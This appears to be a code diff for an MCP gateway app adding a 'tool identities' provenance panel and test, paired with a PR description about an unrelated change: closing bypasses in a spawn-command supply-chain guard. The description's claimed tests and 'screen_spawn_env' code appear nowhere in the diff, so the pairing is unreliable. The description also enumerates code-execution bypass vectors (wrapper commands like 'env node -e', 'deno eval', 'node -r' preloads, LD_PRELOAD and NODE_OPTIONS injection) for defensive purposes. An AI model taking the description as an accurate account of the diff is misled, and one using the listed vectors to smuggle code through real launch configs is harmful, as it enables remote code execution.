@@ -27,7 +27,7 @@ pub mod teams;
 pub mod vendors;
 
 use downstream::{DownstreamServer, StdioTransport};
-use registry::{Registry, ServerEntry};
+use registry::{Profile, Registry, ServerEntry};
 
 type RegistryState = Mutex<Registry>;
 
@@ -1013,6 +1013,110 @@ fn clear_search_traces() -> Result<(), String> {
     Ok(())
 }
 
+/// One exposed tool's verifiable identity: the model-visible alias joined back to its
+/// source server + the profiles that enable it, plus the integrity fingerprint and
+/// when the definition was first seen / last changed. This is the "capability
+/// provenance" view: prefixing helps the model pick a tool, this helps a human verify
+/// what actually crossed the boundary.
+#[derive(serde::Serialize, Clone)]
+#[serde(rename_all = "camelCase")]
+struct ToolIdentity {
+    /// Model-visible exposed name (the integrity pin key).
+    alias: String,
+    /// Resolved source server id, or empty if the alias couldn't be attributed (a
+    /// renamed tool whose alias no longer carries its `server__` prefix; its exact
+    /// provenance needs the deeper gateway integration, tracked separately).
+    server_id: String,
+    server_name: String,
+    /// Names of the profiles whose enabled set includes this server.
+    profiles: Vec<String>,
+    /// Upstream tool name, taken as the alias suffix after `server__`.
+    upstream: String,
+    /// Version-prefixed fingerprint of the pinned definition (drift detection compares
+    /// against this exact value).
+    fingerprint: String,
+    first_seen: u64,
+    last_changed: u64,
+    quarantined: bool,
+}
+
+/// Assemble the identity rows. Pure (no state/IO) so the alias->server attribution is
+/// unit-testable.
+fn build_tool_identities(
+    baselines: &std::collections::BTreeMap<String, integrity::ToolBaseline>,
+    quarantined: &std::collections::BTreeSet<String>,
+    servers: &[ServerEntry],
+    profiles: &[Profile],
+) -> Vec<ToolIdentity> {
+    // Exposed prefix (sanitize_segment(id)) -> server. Matching by the KNOWN prefixes
+    // (longest wins) is robust against a server id that itself contains `__`, unlike a
+    // naive split on the first separator.
+    let prefixed: Vec<(String, &ServerEntry)> = servers
+        .iter()
+        .map(|s| (router::sanitize_segment(&s.id), s))
+        .collect();
+    baselines
+        .iter()
+        .map(|(alias, base)| {
+            let mut server: Option<&ServerEntry> = None;
+            let mut upstream = String::new();
+            let mut best_len = 0usize;
+            for (prefix, srv) in &prefixed {
+                if let Some(rest) = alias
+                    .strip_prefix(prefix.as_str())
+                    .and_then(|r| r.strip_prefix("__"))
+                {
+                    if prefix.len() > best_len || server.is_none() {
+                        best_len = prefix.len();
+                        server = Some(srv);
+                        upstream = rest.to_string();
+                    }
+                }
+            }
+            let (server_id, server_name) =
+                server.map(|s| (s.id.clone(), s.name.clone())).unwrap_or_default();
+            let profile_names = if server_id.is_empty() {
+                Vec::new()
+            } else {
+                profiles
+                    .iter()
+                    .filter(|p| p.enabled_server_ids.contains(&server_id))
+                    .map(|p| p.name.clone())
+                    .collect()
+            };
+            ToolIdentity {
+                alias: alias.clone(),
+                server_id,
+                server_name,
+                profiles: profile_names,
+                upstream,
+                fingerprint: base.fingerprint.clone(),
+                first_seen: base.first_seen,
+                last_changed: base.last_changed,
+                quarantined: quarantined.contains(alias),
+            }
+        })
+        .collect()
+}
+
+/// The capability-provenance table: every pinned tool's identity for the active
+/// profile, newest-changed first. Empty until the gateway has pinned a baseline.
+#[tauri::command]
+fn list_tool_identities(state: State<RegistryState>) -> Vec<ToolIdentity> {
+    let reg = state
+        .lock()
+        .unwrap_or_else(std::sync::PoisonError::into_inner);
+    let profile = reg.active_profile_id.as_deref();
+    let mut ids = build_tool_identities(
+        &integrity::baselines(profile),
+        &integrity::quarantined(profile),
+        &reg.servers,
+        &reg.profiles,
+    );
+    ids.sort_by(|a, b| b.last_changed.cmp(&a.last_changed).then(a.alias.cmp(&b.alias)));
+    ids
+}
+
 /// Toggle quarantine-on-drift. When enabled, the gateway hides and blocks a high-risk
 /// tool (poisoned definition, or a destructive tool whose definition changed/appeared)
 /// that drifts from its pinned baseline, until the user re-approves it.
@@ -1934,6 +2038,7 @@ pub fn run() {
             clear_inspect_log,
             get_search_traces,
             clear_search_traces,
+            list_tool_identities,
             set_quarantine_on_drift,
             list_quarantined,
             release_quarantine,
@@ -2083,6 +2188,67 @@ mod tests {
             source: None,
             disabled_tools: vec![],
         }
+    }
+
+    fn plain_server(id: &str, name: &str) -> ServerEntry {
+        ServerEntry {
+            id: id.into(),
+            name: name.into(),
+            transport: "stdio".into(),
+            command: Some("x".into()),
+            args: vec![],
+            env: vec![],
+            url: None,
+            source: None,
+            disabled_tools: vec![],
+        }
+    }
+
+    #[test]
+    fn tool_identities_attribute_alias_to_server_and_profiles() {
+        use std::collections::{BTreeMap, BTreeSet};
+        let servers = vec![plain_server("gh", "GitHub"), plain_server("my-server", "My Server")];
+        let profiles = vec![Profile {
+            id: "default".into(),
+            name: "Default".into(),
+            enabled_server_ids: vec!["gh".into()],
+        }];
+        let mut baselines = BTreeMap::new();
+        let bl = |fp: &str, fs: u64, lc: u64| integrity::ToolBaseline {
+            fingerprint: fp.into(),
+            first_seen: fs,
+            last_changed: lc,
+        };
+        baselines.insert("gh__create_issue".to_string(), bl("v2:abc", 100, 200));
+        baselines.insert("my_server__do_thing".to_string(), bl("v2:def", 50, 60));
+        baselines.insert("orphan_alias".to_string(), bl("v2:ghi", 1, 2));
+        let quarantined: BTreeSet<String> =
+            ["gh__create_issue".to_string()].into_iter().collect();
+
+        let ids = build_tool_identities(&baselines, &quarantined, &servers, &profiles);
+        let get = |a: &str| ids.iter().find(|i| i.alias == a).cloned().unwrap();
+
+        let gh = get("gh__create_issue");
+        assert_eq!(gh.server_id, "gh");
+        assert_eq!(gh.server_name, "GitHub");
+        assert_eq!(gh.upstream, "create_issue");
+        assert_eq!(gh.profiles, vec!["Default".to_string()]);
+        assert_eq!(gh.fingerprint, "v2:abc");
+        assert!(gh.quarantined);
+
+        // The REAL server id ("my-server") is recovered even though its exposed prefix
+        // is the sanitized "my_server". Not enabled in any profile -> empty profiles.
+        let my = get("my_server__do_thing");
+        assert_eq!(my.server_id, "my-server");
+        assert_eq!(my.upstream, "do_thing");
+        assert!(my.profiles.is_empty());
+        assert!(!my.quarantined);
+
+        // An alias matching no server prefix is honestly left unattributed, not guessed.
+        let orphan = get("orphan_alias");
+        assert_eq!(orphan.server_id, "");
+        assert_eq!(orphan.server_name, "");
+        assert!(orphan.profiles.is_empty());
     }
 
     #[test]

--- a/src/components/ActivityView.tsx
+++ b/src/components/ActivityView.tsx
@@ -4,6 +4,7 @@ import {
   AlertTriangle,
   CheckCircle2,
   ChevronRight,
+  Fingerprint,
   History,
   ScrollText,
   Search,
@@ -24,6 +25,7 @@ import {
   getSavingsSummary,
   getSearchTraces,
   getSecurityEvents,
+  getToolIdentities,
   type SecurityEvent,
 } from "@/lib/api";
 import type {
@@ -34,6 +36,7 @@ import type {
   SavingsSummary,
   SearchTrace,
   ServerStat,
+  ToolIdentity,
 } from "@/lib/types";
 import {
   Select,
@@ -832,6 +835,120 @@ function DiscoveryTraces({ refreshKey }: { refreshKey: number }) {
   );
 }
 
+/** One tool's identity card: the model-visible alias joined to its source server +
+ * profiles, with the pinned definition fingerprint and first-seen / last-changed. */
+function ToolIdentityRow({ t }: { t: ToolIdentity }) {
+  const [open, setOpen] = useState(false);
+  const fpShort = t.fingerprint.replace(/^v\d+:/, "").slice(0, 12) || "-";
+  const fmtDate = (ms: number) => (ms > 0 ? new Date(ms).toLocaleDateString() : "-");
+  return (
+    <div className="rounded-md border border-border/50 text-sm">
+      <div
+        className="flex cursor-pointer items-center gap-3 px-3 py-2 hover:bg-muted/30"
+        onClick={() => setOpen((o) => !o)}
+        role="button"
+        aria-expanded={open}
+        tabIndex={0}
+      >
+        <ChevronRight
+          className={`size-3.5 shrink-0 text-muted-foreground transition-transform ${
+            open ? "rotate-90" : ""
+          }`}
+        />
+        <span className="min-w-0 truncate font-mono text-xs">{t.alias}</span>
+        <span className="shrink-0 rounded bg-muted px-1.5 py-0.5 text-[11px] text-muted-foreground">
+          {t.serverName || t.serverId || "unattributed"}
+        </span>
+        {t.quarantined && (
+          <span className="shrink-0 rounded bg-warning/15 px-1.5 py-0.5 text-[11px] text-warning">
+            quarantined
+          </span>
+        )}
+        <span
+          className="ml-auto shrink-0 font-mono text-[11px] text-muted-foreground"
+          title={t.fingerprint}
+        >
+          {fpShort}
+        </span>
+      </div>
+      {open && (
+        <div className="border-t border-border/50 bg-muted/20 px-3 py-2 pl-9 text-xs">
+          <dl className="grid grid-cols-[7rem_1fr] gap-x-3 gap-y-1">
+            <dt className="text-muted-foreground">Upstream tool</dt>
+            <dd className="font-mono break-all">{t.upstream || "-"}</dd>
+            <dt className="text-muted-foreground">Source server</dt>
+            <dd>{t.serverName ? `${t.serverName} (${t.serverId})` : "unattributed"}</dd>
+            <dt className="text-muted-foreground">Profiles</dt>
+            <dd>{t.profiles.length ? t.profiles.join(", ") : "-"}</dd>
+            <dt className="text-muted-foreground">Fingerprint</dt>
+            <dd className="font-mono break-all">{t.fingerprint || "-"}</dd>
+            <dt className="text-muted-foreground">First seen</dt>
+            <dd>{fmtDate(t.firstSeen)}</dd>
+            <dt className="text-muted-foreground">Last changed</dt>
+            <dd>{fmtDate(t.lastChanged)}</dd>
+          </dl>
+        </div>
+      )}
+    </div>
+  );
+}
+
+/** Collapsible capability-provenance panel: every pinned tool's identity, so a human
+ * can verify which server/profile an alias maps to and whether its definition drifted.
+ * Self-hides until the gateway has pinned a baseline. */
+function ToolIdentities({ refreshKey }: { refreshKey: number }) {
+  const [rows, setRows] = useState<ToolIdentity[]>([]);
+  const [open, setOpen] = useState(false);
+
+  useEffect(() => {
+    let alive = true;
+    getToolIdentities()
+      .then((r) => alive && setRows(r))
+      .catch(() => alive && setRows([]));
+    return () => {
+      alive = false;
+    };
+  }, [refreshKey]);
+
+  if (rows.length === 0) return null;
+
+  return (
+    <div className="mb-6 rounded-lg border border-border/60 bg-muted/[0.04] p-4">
+      <button
+        onClick={() => setOpen((v) => !v)}
+        aria-expanded={open}
+        className="flex w-full items-center gap-2 text-left"
+      >
+        <Fingerprint className="size-4 shrink-0 text-muted-foreground" />
+        <h3 className="text-sm font-medium">Tool identities</h3>
+        <span className="rounded-full bg-muted px-1.5 py-0.5 text-xs font-medium text-muted-foreground">
+          {rows.length}
+        </span>
+        <ChevronRight
+          className={`ml-auto size-4 text-muted-foreground transition-transform ${
+            open ? "rotate-90" : ""
+          }`}
+        />
+      </button>
+      {open && (
+        <>
+          <p className="mt-2 mb-3 max-w-2xl text-xs text-muted-foreground">
+            What each model-visible tool name actually maps to: its source server and
+            profiles, the pinned definition fingerprint drift detection checks against, and
+            when it was first seen or last changed. Prefixing helps the model pick a tool;
+            this helps you verify what crossed the boundary.
+          </p>
+          <div className="flex flex-col gap-1">
+            {rows.map((t) => (
+              <ToolIdentityRow key={t.alias} t={t} />
+            ))}
+          </div>
+        </>
+      )}
+    </div>
+  );
+}
+
 /** Collapsible live inspector: a local "network tab" for MCP. Only rendered while
  * live inspection is on. Lists recent captured calls, each expandable to its raw
  * request + response JSON. Ephemeral, local, opt-in. */
@@ -969,6 +1086,7 @@ export function ActivityView({
         <QuietDriftHistory events={infoSecurity} onDismiss={dismissSecurity} />
       ) : null}
       <DiscoveryTraces refreshKey={refreshKey} />
+      <ToolIdentities refreshKey={refreshKey} />
       {registry?.liveInspect ? <LiveInspector refreshKey={refreshKey} /> : null}
       {savings && savings.tokensSaved > 0 ? (
         <SavingsBanner savings={savings} />

--- a/src/lib/api.ts
+++ b/src/lib/api.ts
@@ -18,6 +18,7 @@ import type {
   Registry,
   SavingsSummary,
   SearchTrace,
+  ToolIdentity,
   ServerEntry,
   ToolCallResult,
   Stack,
@@ -250,6 +251,12 @@ export function getSearchTraces(limit = 100): Promise<SearchTrace[]> {
 /** Clear the search-trace log. */
 export function clearSearchTraces(): Promise<void> {
   return invoke<void>("clear_search_traces");
+}
+
+/** Every pinned tool's verifiable identity (alias -> server/profiles + fingerprint +
+ * first-seen/last-changed) for the active profile. Empty until a baseline is pinned. */
+export function getToolIdentities(): Promise<ToolIdentity[]> {
+  return invoke<ToolIdentity[]>("list_tool_identities");
 }
 
 /** Toggle quarantine-on-drift: block a high-risk tool that drifted until re-approved. */

--- a/src/lib/types.ts
+++ b/src/lib/types.ts
@@ -107,6 +107,20 @@ export interface SearchTrace {
   escalated: boolean;
 }
 
+/** One exposed tool's verifiable identity: the model-visible alias joined back to its
+ * source server + profiles, with the integrity fingerprint and first-seen/last-changed. */
+export interface ToolIdentity {
+  alias: string;
+  serverId: string;
+  serverName: string;
+  profiles: string[];
+  upstream: string;
+  fingerprint: string;
+  firstSeen: number;
+  lastChanged: number;
+  quarantined: boolean;
+}
+
 export interface ProbeResult {
   serverId: string;
   ok: boolean;


### PR DESCRIPTION
An adversarial review of `screen_spawn_command` (the supply-chain guard that refuses code-smuggling launch args on a spawned stdio server) found several **real, verified bypasses** a booby-trapped team- or registry-sourced config could use to reach code execution. The guard's whole value is having no bypass, so these are worth closing.

## Bypasses closed
- **Wrapper commands.** `env` / `sudo` / `time` / `nice` / `nohup` / `xargs` / `stdbuf` / `timeout` / ... run the real program from *their* args, so `env node -e <code>` sailed past the basename dispatch. Now refused outright (set env vars in the server's env field; name the real program as the command).
- **Deno subcommands.** `deno eval <code>` and `deno run <remote-url>` are subcommands, not flags, so they weren't screened. Now caught (a local `deno run ./server.ts` still passes).
- **Missing interpreters / shells.** `osascript` (macOS), `elixir`/`iex`, `lua`/`luajit`, `Rscript`/`R`, `julia`, `groovy`, `scala`, `clojure`, `bb`, `tclsh`, and Windows **`cmd /c` / `/k`** (only `pwsh`/`powershell` were listed) now screen their inline-eval flags.
- **Attached node preload.** `node -r./pwn.js` (attached, no `=`) slipped the equality check; now caught.
- **env-var injection (new `screen_spawn_env`).** The config's `env` was never screened, so `LD_PRELOAD` / `LD_AUDIT` / `DYLD_INSERT_LIBRARIES` / `BASH_ENV` / `ENV` / `PERL5OPT` / `RUBYOPT`, and preload/eval options inside `NODE_OPTIONS`, turned a benign `node server.js` into RCE. Screened at the single spawn choke point (`spawn_inner`).

## No false positives
`npx`, `uvx`, `node server.js`, `python -m`, `python main.py`, `docker run` (normal + volume mounts), a plain binary, benign env vars, and `NODE_OPTIONS=--max-old-space-size=4096` all still pass. 5 new tests cover every bypass vector **and** these legit configs; 253 lib tests pass.

Found by an adversarial review agent; a fresh review of this fix is running.
